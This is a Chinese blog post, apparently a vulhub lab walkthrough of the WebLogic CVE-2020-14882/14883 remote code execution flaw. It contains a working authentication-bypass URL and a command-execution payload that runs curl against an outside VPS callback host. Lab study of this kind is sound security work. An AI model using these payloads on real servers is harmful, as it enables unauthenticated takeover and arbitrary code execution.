【vulhub】CVE-2020-14882 WebLogic远程代码执行漏洞

前言

远程代码执行漏洞 (CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。

一、启动靶机

在这里插入代码片
在这里插入代码片

二、漏洞利用

靶机搭建成功

http://192.168.150.146:7001/console/login/LoginForm.jsp

在这里插入图片描述
1、访问如下URL,即可绕过身份验证,进入后台
URL:

http://192.168.150.146:7001/console/images/%252E%252E%252Fconsole.portal
?_nfpb=true
&_pageLabel=AppDeploymentsControlPage
&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

在这里插入图片描述
2、命令执行

http://192.168.150.146:7001/console/images/%252E%252E%252Fconsole.portal
?_nfpb=true
&_pageLabel=HomePage1
&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27curl http://VPS_IP/Hacker%27);%22)

在这里插入图片描述

三、检验

在VPS上的apache日志有靶机的请求记录。

tail -n 1 -f /var/log/apache2/access.log

在这里插入图片描述

参考:

https://www.cnblogs.com/hxlinux/p/14723721.html


版权声明:本文为weixin_42884199原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。